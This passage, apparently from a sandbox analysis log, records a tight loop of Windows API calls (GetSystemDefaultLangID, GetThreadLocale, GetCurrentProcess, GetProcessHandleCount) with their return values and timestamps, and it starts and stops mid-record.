returned 0xffffffff [0095.001] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.001] GetSystemDefaultLangID () returned 0x2710409 [0095.001] GetThreadLocale () returned 0x409 [0095.001] GetCurrentProcess () returned 0xffffffff [0095.001] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.001] GetSystemDefaultLangID () returned 0x2710409 [0095.001] GetThreadLocale () returned 0x409 [0095.001] GetCurrentProcess () returned 0xffffffff [0095.001] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.001] GetSystemDefaultLangID () returned 0x2710409 [0095.001] GetThreadLocale () returned 0x409 [0095.001] GetCurrentProcess () returned 0xffffffff [0095.001] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.001] GetSystemDefaultLangID () returned 0x2710409 [0095.001] GetThreadLocale () returned 0x409 [0095.001] GetCurrentProcess () returned 0xffffffff [0095.001] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.001] GetSystemDefaultLangID () returned 0x2710409 [0095.001] GetThreadLocale () returned 0x409 [0095.001] GetCurrentProcess () returned 0xffffffff [0095.001] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.002] GetSystemDefaultLangID () returned 0x2710409 [0095.002] GetThreadLocale () returned 0x409 [0095.002] GetCurrentProcess () returned 0xffffffff [0095.002] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.002] GetSystemDefaultLangID () returned 0x2710409 [0095.002] GetThreadLocale () returned 0x409 [0095.002] GetCurrentProcess () returned 0xffffffff [0095.002] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.003] GetSystemDefaultLangID () returned 0x2710409 [0095.003] GetThreadLocale () returned 0x409 [0095.003] GetCurrentProcess () returned 0xffffffff [0095.003] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.003] GetSystemDefaultLangID () returned 0x2710409 [0095.003] GetThreadLocale () returned 0x409 [0095.003] GetCurrentProcess () returned 0xffffffff [0095.003] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.003] GetSystemDefaultLangID () returned 0x2710409 [0095.003] GetThreadLocale () returned 0x409 [0095.003] GetCurrentProcess () returned 0xffffffff [0095.003] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.003] GetSystemDefaultLangID () returned 0x2710409 [0095.003] GetThreadLocale () returned 0x409 [0095.003] GetCurrentProcess () returned 0xffffffff [0095.003] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.003] GetSystemDefaultLangID () returned 0x2710409 [0095.003] GetThreadLocale () returned 0x409 [0095.003] GetCurrentProcess () returned 0xffffffff [0095.003] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.003] GetSystemDefaultLangID () returned 0x2710409 [0095.003] GetThreadLocale () returned 0x409 [0095.003] GetCurrentProcess () returned 0xffffffff [0095.003] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.003] GetSystemDefaultLangID () returned 0x2710409 [0095.003] GetThreadLocale () returned 0x409 [0095.004] GetCurrentProcess () returned 0xffffffff [0095.004] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.004] GetSystemDefaultLangID () returned 0x2710409 [0095.004] GetThreadLocale () returned 0x409 [0095.004] GetCurrentProcess () returned 0xffffffff [0095.004] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.004] GetSystemDefaultLangID () returned 0x2710409 [0095.004] GetThreadLocale () returned 0x409 [0095.004] GetCurrentProcess () returned 0xffffffff [0095.004] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.004] GetSystemDefaultLangID () returned 0x2710409 [0095.004] GetThreadLocale () returned 0x409 [0095.004] GetCurrentProcess () returned 0xffffffff [0095.004] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.004] GetSystemDefaultLangID () returned 0x2710409 [0095.004] GetThreadLocale () returned 0x409 [0095.004] GetCurrentProcess () returned 0xffffffff [0095.004] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.004] GetSystemDefaultLangID () returned 0x2710409 [0095.004] GetThreadLocale () returned 0x409 [0095.004] GetCurrentProcess () returned 0xffffffff [0095.004] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.004] GetSystemDefaultLangID () returned 0x2710409 [0095.004] GetThreadLocale () returned 0x409 [0095.004] GetCurrentProcess () returned 0xffffffff [0095.004] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.005] GetSystemDefaultLangID () returned 0x2710409 [0095.005] GetThreadLocale () returned 0x409 [0095.005] GetCurrentProcess () returned 0xffffffff [0095.005] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.005] GetSystemDefaultLangID () returned 0x2710409 [0095.005] GetThreadLocale () returned 0x409 [0095.005] GetCurrentProcess () returned 0xffffffff [0095.005] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.005] GetSystemDefaultLangID () returned 0x2710409 [0095.005] GetThreadLocale () returned 0x409 [0095.005] GetCurrentProcess () returned 0xffffffff [0095.005] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.005] GetSystemDefaultLangID () returned 0x2710409 [0095.005] GetThreadLocale () returned 0x409 [0095.005] GetCurrentProcess () returned 0xffffffff [0095.005] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.005] GetSystemDefaultLangID () returned 0x2710409 [0095.005] GetThreadLocale () returned 0x409 [0095.005] GetCurrentProcess () returned 0xffffffff [0095.005] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.005] GetSystemDefaultLangID () returned 0x2710409 [0095.005] GetThreadLocale () returned 0x409 [0095.005] GetCurrentProcess () returned 0xffffffff [0095.005] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.005] GetSystemDefaultLangID () returned 0x2710409 [0095.005] GetThreadLocale () returned 0x409 [0095.005] GetCurrentProcess () returned 0xffffffff [0095.006] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.006] GetSystemDefaultLangID () returned 0x2710409 [0095.006] GetThreadLocale () returned 0x409 [0095.006] GetCurrentProcess () returned 0xffffffff [0095.006] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.006] GetSystemDefaultLangID () returned 0x2710409 [0095.006] GetThreadLocale () returned 0x409 [0095.006] GetCurrentProcess () returned 0xffffffff [0095.006] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.006] GetSystemDefaultLangID () returned 0x2710409 [0095.006] GetThreadLocale () returned 0x409 [0095.006] GetCurrentProcess () returned 0xffffffff [0095.006] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.006] GetSystemDefaultLangID () returned 0x2710409 [0095.006] GetThreadLocale () returned 0x409 [0095.006] GetCurrentProcess () returned 0xffffffff [0095.006] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.006] GetSystemDefaultLangID () returned 0x2710409 [0095.006] GetThreadLocale () returned 0x409 [0095.006] GetCurrentProcess () returned 0xffffffff [0095.006] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.006] GetSystemDefaultLangID () returned 0x2710409 [0095.006] GetThreadLocale () returned 0x409 [0095.006] GetCurrentProcess () returned 0xffffffff [0095.006] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.007] GetSystemDefaultLangID () returned 0x2710409 [0095.007] GetThreadLocale () returned 0x409 [0095.007] GetCurrentProcess () returned 0xffffffff [0095.007] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.007] GetSystemDefaultLangID () returned 0x2710409 [0095.007] GetThreadLocale () returned 0x409 [0095.007] GetCurrentProcess () returned 0xffffffff [0095.007] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.007] GetSystemDefaultLangID () returned 0x2710409 [0095.007] GetThreadLocale () returned 0x409 [0095.007] GetCurrentProcess () returned 0xffffffff [0095.007] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.007] GetSystemDefaultLangID () returned 0x2710409 [0095.007] GetThreadLocale () returned 0x409 [0095.007] GetCurrentProcess () returned 0xffffffff [0095.007] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.007] GetSystemDefaultLangID () returned 0x2710409 [0095.007] GetThreadLocale () returned 0x409 [0095.007] GetCurrentProcess () returned 0xffffffff [0095.007] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.007] GetSystemDefaultLangID () returned 0x2710409 [0095.007] GetThreadLocale () returned 0x409 [0095.007] GetCurrentProcess () returned 0xffffffff [0095.007] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.007] GetSystemDefaultLangID () returned 0x2710409 [0095.007] GetThreadLocale () returned 0x409 [0095.007] GetCurrentProcess () returned 0xffffffff [0095.007] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.008] GetSystemDefaultLangID () returned 0x2710409 [0095.008] GetThreadLocale () returned 0x409 [0095.008] GetCurrentProcess () returned 0xffffffff [0095.008] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.008] GetSystemDefaultLangID () returned 0x2710409 [0095.008] GetThreadLocale () returned 0x409 [0095.008] GetCurrentProcess () returned 0xffffffff [0095.008] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.008] GetSystemDefaultLangID () returned 0x2710409 [0095.008] GetThreadLocale () returned 0x409 [0095.008] GetCurrentProcess () returned 0xffffffff [0095.008] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.008] GetSystemDefaultLangID () returned 0x2710409 [0095.008] GetThreadLocale () returned 0x409 [0095.008] GetCurrentProcess () returned 0xffffffff [0095.008] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.008] GetSystemDefaultLangID () returned 0x2710409 [0095.008] GetThreadLocale () returned 0x409 [0095.008] GetCurrentProcess () returned 0xffffffff [0095.008] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.008] GetSystemDefaultLangID () returned 0x2710409 [0095.008] GetThreadLocale () returned 0x409 [0095.008] GetCurrentProcess () returned 0xffffffff [0095.008] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.008] GetSystemDefaultLangID () returned 0x2710409 [0095.009] GetThreadLocale () returned 0x409 [0095.009] GetCurrentProcess () returned 0xffffffff [0095.009] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.009] GetSystemDefaultLangID () returned 0x2710409 [0095.009] GetThreadLocale () returned 0x409 [0095.009] GetCurrentProcess () returned 0xffffffff [0095.009] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.009] GetSystemDefaultLangID () returned 0x2710409 [0095.009] GetThreadLocale () returned 0x409 [0095.009] GetCurrentProcess () returned 0xffffffff [0095.009] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.009] GetSystemDefaultLangID () returned 0x2710409 [0095.009] GetThreadLocale () returned 0x409 [0095.009] GetCurrentProcess () returned 0xffffffff [0095.009] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.009] GetSystemDefaultLangID () returned 0x2710409 [0095.009] GetThreadLocale () returned 0x409 [0095.009] GetCurrentProcess () returned 0xffffffff [0095.009] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.009] GetSystemDefaultLangID () returned 0x2710409 [0095.009] GetThreadLocale () returned 0x409 [0095.009] GetCurrentProcess () returned 0xffffffff [0095.009] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.009] GetSystemDefaultLangID () returned 0x2710409 [0095.009] GetThreadLocale () returned 0x409 [0095.009] GetCurrentProcess () returned 0xffffffff [0095.009] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.010] GetSystemDefaultLangID () returned 0x2710409 [0095.010] GetThreadLocale () returned 0x409 [0095.010] GetCurrentProcess () returned 0xffffffff [0095.010] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.010] GetSystemDefaultLangID () returned 0x2710409 [0095.010] GetThreadLocale () returned 0x409 [0095.010] GetCurrentProcess () returned 0xffffffff [0095.010] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.010] GetSystemDefaultLangID () returned 0x2710409 [0095.010] GetThreadLocale () returned 0x409 [0095.010] GetCurrentProcess () returned 0xffffffff [0095.010] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.010] GetSystemDefaultLangID () returned 0x2710409 [0095.010] GetThreadLocale () returned 0x409 [0095.010] GetCurrentProcess () returned 0xffffffff [0095.010] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.010] GetSystemDefaultLangID () returned 0x2710409 [0095.010] GetThreadLocale () returned 0x409 [0095.010] GetCurrentProcess () returned 0xffffffff [0095.010] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.010] GetSystemDefaultLangID () returned 0x2710409 [0095.010] GetThreadLocale () returned 0x409 [0095.010] GetCurrentProcess () returned 0xffffffff [0095.010] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.010] GetSystemDefaultLangID () returned 0x2710409 [0095.010] GetThreadLocale () returned 0x409 [0095.011] GetCurrentProcess () returned 0xffffffff [0095.011] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.011] GetSystemDefaultLangID () returned 0x2710409 [0095.011] GetThreadLocale () returned 0x409 [0095.011] GetCurrentProcess () returned 0xffffffff [0095.011] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.011] GetSystemDefaultLangID () returned 0x2710409 [0095.011] GetThreadLocale () returned 0x409 [0095.011] GetCurrentProcess () returned 0xffffffff [0095.011] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.011] GetSystemDefaultLangID () returned 0x2710409 [0095.011] GetThreadLocale () returned 0x409 [0095.011] GetCurrentProcess () returned 0xffffffff [0095.011] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.011] GetSystemDefaultLangID () returned 0x2710409 [0095.011] GetThreadLocale () returned 0x409 [0095.011] GetCurrentProcess () returned 0xffffffff [0095.011] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.011] GetSystemDefaultLangID () returned 0x2710409 [0095.011] GetThreadLocale () returned 0x409 [0095.011] GetCurrentProcess () returned 0xffffffff [0095.011] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.011] GetSystemDefaultLangID () returned 0x2710409 [0095.011] GetThreadLocale () returned 0x409 [0095.011] GetCurrentProcess () returned 0xffffffff [0095.011] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.011] GetSystemDefaultLangID () returned 0x2710409 [0095.012] GetThreadLocale () returned 0x409 [0095.012] GetCurrentProcess () returned 0xffffffff [0095.012] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.012] GetSystemDefaultLangID () returned 0x2710409 [0095.012] GetThreadLocale () returned 0x409 [0095.012] GetCurrentProcess () returned 0xffffffff [0095.012] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.012] GetSystemDefaultLangID () returned 0x2710409 [0095.012] GetThreadLocale () returned 0x409 [0095.012] GetCurrentProcess () returned 0xffffffff [0095.012] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.012] GetSystemDefaultLangID () returned 0x2710409 [0095.012] GetThreadLocale () returned 0x409 [0095.012] GetCurrentProcess () returned 0xffffffff [0095.012] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.012] GetSystemDefaultLangID () returned 0x2710409 [0095.012] GetThreadLocale () returned 0x409 [0095.012] GetCurrentProcess () returned 0xffffffff [0095.012] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.012] GetSystemDefaultLangID () returned 0x2710409 [0095.012] GetThreadLocale () returned 0x409 [0095.012] GetCurrentProcess () returned 0xffffffff [0095.012] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.012] GetSystemDefaultLangID () returned 0x2710409 [0095.012] GetThreadLocale () returned 0x409 [0095.012] GetCurrentProcess () returned 0xffffffff [0095.012] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.013] GetSystemDefaultLangID () returned 0x2710409 [0095.013] GetThreadLocale () returned 0x409 [0095.013] GetCurrentProcess () returned 0xffffffff [0095.013] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.013] GetSystemDefaultLangID () returned 0x2710409 [0095.013] GetThreadLocale () returned 0x409 [0095.013] GetCurrentProcess () returned 0xffffffff [0095.013] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.013] GetSystemDefaultLangID () returned 0x2710409 [0095.013] GetThreadLocale () returned 0x409 [0095.013] GetCurrentProcess () returned 0xffffffff [0095.013] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.013] GetSystemDefaultLangID () returned 0x2710409 [0095.013] GetThreadLocale () returned 0x409 [0095.013] GetCurrentProcess () returned 0xffffffff [0095.013] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.013] GetSystemDefaultLangID () returned 0x2710409 [0095.013] GetThreadLocale () returned 0x409 [0095.013] GetCurrentProcess () returned 0xffffffff [0095.013] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.013] GetSystemDefaultLangID () returned 0x2710409 [0095.013] GetThreadLocale () returned 0x409 [0095.013] GetCurrentProcess () returned 0xffffffff [0095.013] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.013] GetSystemDefaultLangID () returned 0x2710409 [0095.013] GetThreadLocale () returned 0x409 [0095.013] GetCurrentProcess () returned 0xffffffff [0095.014] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.014] GetSystemDefaultLangID () returned 0x2710409 [0095.014] GetThreadLocale () returned 0x409 [0095.014] GetCurrentProcess () returned 0xffffffff [0095.014] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.014] GetSystemDefaultLangID () returned 0x2710409 [0095.014] GetThreadLocale () returned 0x409 [0095.014] GetCurrentProcess () returned 0xffffffff [0095.014] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.014] GetSystemDefaultLangID () returned 0x2710409 [0095.014] GetThreadLocale () returned 0x409 [0095.014] GetCurrentProcess () returned 0xffffffff [0095.014] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.014] GetSystemDefaultLangID () returned 0x2710409 [0095.014] GetThreadLocale () returned 0x409 [0095.014] GetCurrentProcess () returned 0xffffffff [0095.014] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.014] GetSystemDefaultLangID () returned 0x2710409 [0095.014] GetThreadLocale () returned 0x409 [0095.014] GetCurrentProcess () returned 0xffffffff [0095.014] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.014] GetSystemDefaultLangID () returned 0x2710409 [0095.014] GetThreadLocale () returned 0x409 [0095.014] GetCurrentProcess () returned 0xffffffff [0095.014] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.014] GetSystemDefaultLangID () returned 0x2710409 [0095.015] GetThreadLocale () returned 0x409 [0095.015] GetCurrentProcess () returned 0xffffffff [0095.015] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.015] GetSystemDefaultLangID () returned 0x2710409 [0095.015] GetThreadLocale () returned 0x409 [0095.015] GetCurrentProcess () returned 0xffffffff [0095.015] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.015] GetSystemDefaultLangID () returned 0x2710409 [0095.015] GetThreadLocale () returned 0x409 [0095.015] GetCurrentProcess () returned 0xffffffff [0095.015] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.015] GetSystemDefaultLangID () returned 0x2710409 [0095.015] GetThreadLocale () returned 0x409 [0095.015] GetCurrentProcess () returned 0xffffffff [0095.015] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.015] GetSystemDefaultLangID () returned 0x2710409 [0095.015] GetThreadLocale () returned 0x409 [0095.015] GetCurrentProcess () returned 0xffffffff [0095.015] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.015] GetSystemDefaultLangID () returned 0x2710409 [0095.015] GetThreadLocale () returned 0x409 [0095.015] GetCurrentProcess () returned 0xffffffff [0095.015] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.015] GetSystemDefaultLangID () returned 0x2710409 [0095.016] GetThreadLocale () returned 0x409 [0095.016] GetCurrentProcess () returned 0xffffffff [0095.016] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.016] GetSystemDefaultLangID () returned 0x2710409 [0095.016] GetThreadLocale () returned 0x409 [0095.016] GetCurrentProcess () returned 0xffffffff [0095.016] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.016] GetSystemDefaultLangID () returned 0x2710409 [0095.016] GetThreadLocale () returned 0x409 [0095.016] GetCurrentProcess () returned 0xffffffff [0095.016] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.016] GetSystemDefaultLangID () returned 0x2710409 [0095.016] GetThreadLocale () returned 0x409 [0095.016] GetCurrentProcess () returned 0xffffffff [0095.016] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.016] GetSystemDefaultLangID () returned 0x2710409 [0095.016] GetThreadLocale () returned 0x409 [0095.016] GetCurrentProcess () returned 0xffffffff [0095.016] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.016] GetSystemDefaultLangID () returned 0x2710409 [0095.016] GetThreadLocale () returned 0x409 [0095.016] GetCurrentProcess () returned 0xffffffff [0095.016] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.016] GetSystemDefaultLangID () returned 0x2710409 [0095.016] GetThreadLocale () returned 0x409 [0095.016] GetCurrentProcess () returned 0xffffffff [0095.016] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.017] GetSystemDefaultLangID () returned 0x2710409 [0095.017] GetThreadLocale () returned 0x409 [0095.017] GetCurrentProcess () returned 0xffffffff [0095.017] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.017] GetSystemDefaultLangID () returned 0x2710409 [0095.017] GetThreadLocale () returned 0x409 [0095.017] GetCurrentProcess () returned 0xffffffff [0095.017] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.017] GetSystemDefaultLangID () returned 0x2710409 [0095.017] GetThreadLocale () returned 0x409 [0095.017] GetCurrentProcess () returned 0xffffffff [0095.017] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.017] GetSystemDefaultLangID () returned 0x2710409 [0095.017] GetThreadLocale () returned 0x409 [0095.018] GetCurrentProcess () returned 0xffffffff [0095.018] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.018] GetSystemDefaultLangID () returned 0x2710409 [0095.018] GetThreadLocale () returned 0x409 [0095.018] GetCurrentProcess () returned 0xffffffff [0095.018] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.018] GetSystemDefaultLangID () returned 0x2710409 [0095.018] GetThreadLocale () returned 0x409 [0095.018] GetCurrentProcess () returned 0xffffffff [0095.018] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.018] GetSystemDefaultLangID () returned 0x2710409 [0095.018] GetThreadLocale () returned 0x409 [0095.018] GetCurrentProcess () returned 0xffffffff [0095.018] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.018] GetSystemDefaultLangID () returned 0x2710409 [0095.018] GetThreadLocale () returned 0x409 [0095.018] GetCurrentProcess () returned 0xffffffff [0095.018] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.018] GetSystemDefaultLangID () returned 0x2710409 [0095.018] GetThreadLocale () returned 0x409 [0095.018] GetCurrentProcess () returned 0xffffffff [0095.018] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.018] GetSystemDefaultLangID () returned 0x2710409 [0095.018] GetThreadLocale () returned 0x409 [0095.018] GetCurrentProcess () returned 0xffffffff [0095.019] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) 